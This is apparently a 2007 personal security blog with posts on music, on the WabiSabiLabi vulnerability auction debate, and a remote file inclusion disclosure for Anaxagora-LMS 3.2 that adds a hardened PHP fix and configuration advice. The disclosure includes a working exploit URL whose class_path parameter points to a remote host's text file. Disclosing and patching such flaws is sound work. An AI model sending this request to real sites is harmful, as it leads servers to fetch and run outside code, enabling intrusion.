Monday, July 23, 2007

This is why Sundays are the best day of the week!

Check out The Joys and be sure to pick up their cd Demolition Session or pre-order their new one. Here's a dose of a Sunday night ritual.

Download link here


Friday, July 13, 2007

All the WabiSabiLabi hype

I was reading through an article on SecurityFocus about the new vulnerability auction site WabiSabiLabi. Basically there's a lot of commotion because people are scared that organized crime (and other bad people) will be able to buy these vulnerabilities and use them in targeted attacks. Now I can see that happening, but it causes me to stop and think.

Any true 'organized crime' group probably doesn't need to buy these vulnerabilities because they have their own hackers, and they more than likely have their own vulns. Maybe it would save them time to just spend $2000 and get a PoC, but I don't think they would need it.

Maybe I'm a little biased about this article, but every blog I read about it is saying how finally researchers have a chance to earn something from their work. Damn right! Why should you spend x hours researching a vulnerability, then notify the vendor (who probably won't take action soon, if ever) and get nothing out of it? I like the idea of actually getting paid for your research, especially since not everybody has a high-paying job.

My favorite quote from the article:
"We do not believe that offering compensation for vulnerability information is the best way we can help protect our customers," the software giant said in a statement sent to SecurityFocus. "Our policy is to credit finders who report vulnerabilities to us in a responsible manner."
Also, as a Microsoft customer, I feel that if they paid for vulnerabilities they would get a lot more submissions, which would in turn make a more secure operating system (aka protecting their customers).
I know I would much rather get 'credit' from Microsoft as opposed to money for rent....

Thursday, July 12, 2007

Anaxagora RFI vuln

Simple remote file inclusion vulnerability.

Product: Anaxagora-Lms
Version: 3.2
File: Common.inc.php

The $class_path variable is not initialized before it is used in these includes, so a request parameter of the same name can supply it:

include_once($class_path."bdd.class.php");
include_once($class_path."connexion.class.php");
include_once($class_path."membre.class.php");

Vulnerable URL:
LCMS/anaxagora/inc/Common.inc.php?class_path=http://tech.torc.k12.nm.us/techtools/phpinfo.txt?
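The following is an added example, not Anaxagora's own code, showing the hardened form of the include pattern above. It assumes the class files live in the same directory as Common.inc.php (the ANAXAGORA_CLASS_DIR constant and safe_include_class() helper are hypothetical names chosen for the example). The fix is to never derive an include path from request data: the directory comes from the script's own location, the file name is checked against an allow-list, and realpath() confirms the resolved file sits inside that directory.

```php
<?php
// Added example (not the project's code): hardened replacement for
//   include_once($class_path . "bdd.class.php");
// where $class_path was never assigned. With register_globals=On the query
// parameter ?class_path=... fills that variable, and with remote URL includes
// enabled the include fetches and executes whatever the URL serves.

// Assumed layout: the class files sit next to this file.
define('ANAXAGORA_CLASS_DIR', dirname(__FILE__) . DIRECTORY_SEPARATOR);

/**
 * Include one of the known class files by short name.
 * Request data is never consulted, so ?class_path=... has no effect.
 */
function safe_include_class($name)
{
    // Allow-list of the class files Common.inc.php is known to need.
    static $allowed = array('bdd', 'connexion', 'membre');

    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("Unknown class file: " . $name);
    }

    $base = realpath(ANAXAGORA_CLASS_DIR);
    $real = realpath(ANAXAGORA_CLASS_DIR . $name . '.class.php');

    // realpath() returns false for missing files and resolves symlinks and
    // "../" segments, so the prefix check refuses anything outside the class dir.
    if ($base === false || $real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("Class file missing or outside class dir: " . $name);
    }

    include_once $real;
}

// Equivalent of the three original includes, with the path fixed server-side.
foreach (array('bdd', 'connexion', 'membre') as $cls) {
    safe_include_class($cls);
}
```

On the configuration side, the same bug is far less dangerous when `register_globals` is off (so request parameters never become plain variables) and remote includes are disabled (`allow_url_include = Off` on PHP 5.2 and later, `allow_url_fopen = Off` on older releases); both settings are worth checking on any host still running this version.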


Wednesday, July 11, 2007

First post

test!